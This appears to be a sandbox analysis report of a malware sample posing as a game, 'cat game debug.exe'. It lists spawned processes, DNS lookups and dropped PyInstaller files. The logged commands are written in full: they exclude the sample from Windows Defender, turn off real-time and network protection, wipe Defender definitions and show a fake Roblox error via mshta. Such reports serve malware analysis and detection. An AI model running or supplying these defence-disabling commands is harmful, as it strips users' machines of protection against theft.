C:\Users\Admin\AppData\Local\Temp\cat game debug.exe
"C:\Users\Admin\AppData\Local\Temp\cat game debug.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cat game debug.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Couldn\x22t find roblox. Make sure you are from web version not microsoft store version!', 0, 'Error', 0+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Couldn\x22t find roblox. Make sure you are from web version not microsoft store version!', 0, 'Error', 0+16);close()"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cat game debug.exe'
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | blank-fci4h.in | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI17162\python310.dll
C:\Users\Admin\AppData\Local\Temp\_MEI17162\VCRUNTIME140.dll
C:\Users\Admin\AppData\Local\Temp\_MEI17162\base_library.zip
C:\Users\Admin\AppData\Local\Temp\_MEI17162\_ctypes.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI17162\libffi-7.dll
C:\Users\Admin\AppData\Local\Temp\_MEI17162\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI17162\_ssl.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI17162\_sqlite3.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI17162\_socket.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI17162\_queue.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI17162\_lzma.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI17162\_hashlib.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI17162\_decimal.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI17162\_bz2.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI17162\unicodedata.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI17162\sqlite3.dll
C:\Users\Admin\AppData\Local\Temp\_MEI17162\select.pyd
C:\Users\Admin\AppData\Local\Temp\_MEI17162\rarreg.key
C:\Users\Admin\AppData\Local\Temp\_MEI17162\libssl-1_1.dll
C:\Users\Admin\AppData\Local\Temp\_MEI17162\libcrypto-1_1.dll
C:\Users\Admin\AppData\Local\Temp\_MEI17162\blank.aes
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nu4zjrdn.le1.ps1
C:\Users\Admin\AppData\Local\Temp\_MEI17162\blank.aes
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log